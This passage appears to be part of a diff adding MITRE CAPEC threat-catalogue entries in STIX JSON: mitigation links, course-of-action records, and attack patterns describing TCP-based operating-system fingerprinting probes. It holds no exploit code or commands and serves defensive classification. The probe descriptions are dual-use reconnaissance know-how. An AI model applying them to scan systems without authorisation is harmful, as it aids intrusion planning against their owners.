"relationship--39f61c35-1731-4cb8-a8eb-bcd81960df63", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b600559a-7621-438f-92e9-088c3cdf5117", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00dd576f-a986-4094-aa7c-3eb1b57dc7d3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc0ab859-a9fe-4f70-a2f6-4e43fa7ba77b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Session tokens for specific host", + "id": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df6702e1-0cee-4251-8188-443a16f750d1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5e5619cd-3104-4816-91eb-2836496ecc8c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "id": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b1356d6-39be-4183-9bbf-e8fa5b7f799e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.", + "external_references": [ + { + "external_id": "CAPEC-320", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/320.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15fddec-fd55-4c0b-8681-4e57ba5bc20d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Timestamp Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if timestamps are present.: The adversary sends a probe packet to the remote host to identify if timestamps are present.

Experiment

  1. Record and analyze timestamp values.: If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.

    2. Techniques
    The adversary sends several requests and records the timestamp values.
    The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
    The adversary compares this result to a database of known TCP timestamp increments for a possible match.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.", + "external_references": [ + { + "external_id": "CAPEC-321", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/321.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--cd7d1252-30ed-4ba1-a334-52f7a8b7c748", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Sequence Number Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.", + "external_references": [ + { + "external_id": "CAPEC-322", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/322.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Greatest Common Divisor Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.", + "external_references": [ + { + "external_id": "CAPEC-323", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/323.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4ac0eeac-2467-403a-9c64-be3a7b3f3083", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Counter Rate Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \"connected\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-326", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4dd22c6-ad54-47c8-b0ab-d7f3cad9e026", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Initial Window Size Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.", + "external_references": [ + { + "external_id": "CAPEC-327", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c0ad20d0-8b30-460c-a060-da46582bdbec", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Options Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.", + "external_references": [ + { + "external_id": "CAPEC-328", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 'RST' Flag Checksum Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then 